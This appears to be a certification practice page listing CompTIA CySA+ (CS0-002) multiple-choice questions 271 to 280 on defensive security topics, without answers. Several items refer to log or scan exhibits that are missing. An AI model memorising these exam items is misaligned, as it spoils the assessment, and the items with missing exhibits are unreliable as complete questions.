CS0-002 Exam Details

  • Exam Code: CS0-002
  • Exam Name: CompTIA Cybersecurity Analyst (CySA+)
  • Certification: CompTIA Certifications
  • Vendor: CompTIA
  • Total Questions: 1059 Q&As
  • Last Updated: May 30, 2026

CompTIA CS0-002 Online Questions & Answers

  • Question 271:

    During a review of the vulnerability scan results on a server, an information security analyst notices the following:

    The MOST appropriate action for the analyst to recommend to developers is to change the web server so:

    A. It only accepts TLSv1.2
    B. It only accepts cipher suites using AES and SHA
    C. It no longer accepts the vulnerable cipher suites
    D. SSL/TLS is offloaded to a WAF and load balancer

  • Question 272:

    During a quarterly review of user accounts and activity, a security analyst noticed that after a password reset the head of human resources has been logging in from multiple external locations, including several overseas. Further review of the account showed access rights to a number of corporate applications, including a sensitive accounting application used for employee bonuses. Which of the following security methods could be used to mitigate this risk?

    A. RADIUS identity management
    B. Context-based authentication
    C. Privilege escalation restrictions
    D. Elimination of self-service password resets

  • Question 273:

    Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS? (Select two.)

    A. Patching
    B. NIDS
    C. Segmentation
    D. Disabling unused services
    E. Firewalling

  • Question 274:

    While reviewing system logs, a network administrator discovers the following entry: Which of the following occurred?

    A. An attempt was made to access a remote workstation.
    B. The PsExec services failed to execute.
    C. A remote shell failed to open.
    D. A user was trying to download a password file from a remote system.

  • Question 275:

    A newly appointed Chief Information Security Officer (CISO) has completed a risk assessment review of the organization and wants to reduce the numerous risks that were identified. Which of the following will provide a trend of risk mitigation?

    A. Risk response
    B. Risk analysis
    C. Planning
    D. Oversight
    E. Continuous monitoring

  • Question 276:

    Which of the following factors would determine the regulations placed on data under data sovereignty laws?

    A. What the company intends to do with the data it owns
    B. The company's data security policy
    C. The type of data the company stores
    D. The data laws of the country in which the company is located

  • Question 277:

    Which of the following session management techniques will help to prevent a session identifier from being stolen via an XSS attack?

    A. Ensuring the session identifier length is sufficient
    B. Creating proper session identifier entropy
    C. Applying a secure attribute on session cookies
    D. Utilizing transport layer encryption on all requests
    E. Implementing session cookies with the HttpOnly flag

  • Question 278:

    A cybersecurity analyst is reviewing Apache logs on a web server and finds that some logs are missing. The analyst has identified that the systems administrator accidentally deleted some log files. Which of the following actions or rules should be implemented to prevent this incident from reoccurring?

    A. Personnel training
    B. Separation of duties
    C. Mandatory vacation
    D. Backup server

  • Question 279:

    An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the server's BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed?

    A. Anti-malware application
    B. Host-based IDS
    C. TPM data sealing
    D. File integrity monitoring

  • Question 280:

    Given the following log snippet:

    Which of the following describes the events that have occurred?

    A. An attempt to make an SSH connection from "superman" was done using a password.
    B. An attempt to make an SSH connection from 192.168.1.166 was done using PKI.
    C. An attempt to make an SSH connection from outside the network was done using PKI.
    D. An attempt to make an SSH connection from an unknown IP address was done using a password.
